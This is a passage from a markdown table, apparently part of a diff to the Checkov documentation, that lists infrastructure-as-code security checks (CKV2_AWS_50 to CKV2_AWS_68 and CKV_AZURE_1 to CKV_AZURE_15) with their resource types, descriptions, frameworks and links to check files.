AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) | +| 1486 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) | +| 1487 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1488 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1489 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1490 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | +| 1491 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | +| 1492 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) | +| 1493 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) | +| 1494 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) | +| 1495 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1496 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1497 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1498 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1499 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1500 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1501 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1502 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) | +| 1503 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) | +| 1504 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1505 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1506 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) | +| 1507 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) | +| 1508 | CKV2_AWS_62 | resource | aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) | +| 1509 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) | +| 1510 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) | +| 1511 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) | +| 1512 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) | +| 1513 | CKV2_AWS_67 | resource | aws_kms_key | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1514 | CKV2_AWS_67 | resource | aws_s3_bucket | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1515 | CKV2_AWS_67 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1516 | CKV2_AWS_68 | resource | AWS::IAM::Role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1517 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1518 | CKV2_AWS_68 | resource | aws_iam_role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1519 | CKV2_AWS_68 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1520 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1521 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1522 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1523 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1524 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 1525 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 1526 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) | +| 1527 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | +| 1528 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 1529 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 1530 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 1531 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 1532 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) | +| 1533 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 1534 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 1535 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) | +| 1536 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 1537 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 1538 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) | +| 1539 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 1540 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 1541 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) | +| 1542 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | +| 1543 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | +| 1544 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) | +| 1545 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 1546 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 1547 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 1548 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 1549 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1550 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1551 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 1552 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 1553 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 1554 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 1555 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1556 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1557 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 1558 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 1559 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1560 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1561 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1562 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1563 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1564 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1565 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1566 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1567 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1568 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1569 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1570 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1571 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | +| 1572 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1573 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1574 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1575 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1576 | CKV_AZURE_13 | resource | azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1577 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1578 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1579 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 1580 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 1581 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1582 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1583 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1584 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 1585 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 1586 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1587 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1588 | CKV_AZURE_15 | resource | azurerm_windows_web_app 